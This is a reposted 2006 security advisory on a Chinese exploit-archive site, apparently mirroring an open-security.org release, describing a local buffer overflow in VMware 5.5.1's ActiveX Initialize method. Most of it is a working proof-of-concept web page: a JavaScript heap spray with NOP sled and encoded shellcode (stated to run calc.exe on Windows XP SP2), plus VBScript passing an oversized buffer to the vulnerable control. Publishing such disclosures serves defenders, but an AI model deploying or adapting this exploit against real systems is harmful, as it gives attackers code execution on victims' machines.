首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit
来源:http://www.open-security.org 作者:c0ntex 发布时间:2006-08-28  

/*
*****************************************************************************************************************
$ An open security advisory #17 - VMWare ActiveX lame local overflow
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
2: Bug Released: August 18th or so... 2006
3: Bug Impact Rate: Code execution
4: Bug Scope Rate: Local
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************


VMWare
http://vmware.com

"Revolutionize software development, testing and deployment in your enterprise with powerful virtual
machine software for developers and system administrators. VMware Workstation delivers powerful
virtual machine software for the technical professional."

Since this is a local only for ActiveX component, it requires being emailed or distribution via some
p2p file share network or p2p chat networks. Pretty useless :)

*/


<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered and developed by c0ntex - c0ntexb@gmail.com<br>
Visit my website at http://www.open-security.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefor I fill half a HUGE buffer with the address<br>
(pointer) to my evil buffer, which them trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91")
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090")
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CMS Frogss <= 0.4 (podpis)
·MS Windows NetpIsRemote() Remo
·iziContents <= RC6 GLOBALS[
·e107 <= 0.75 (GLOBALS Overw
·AlberT-EasySite <= 1.0a5 (P
·phpGroupWare <= 0.9.16.010
·MDaemon POP3 Server < 9.06
·Streamripper <= 1.61.25 HTT
·VistaBB <= 2.x (functions_m
·IBM eGatherer <= 3.20.0284.
·Integramod Portal <= 2.x (f
·Streamripper <= 1.61.25 HTT
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved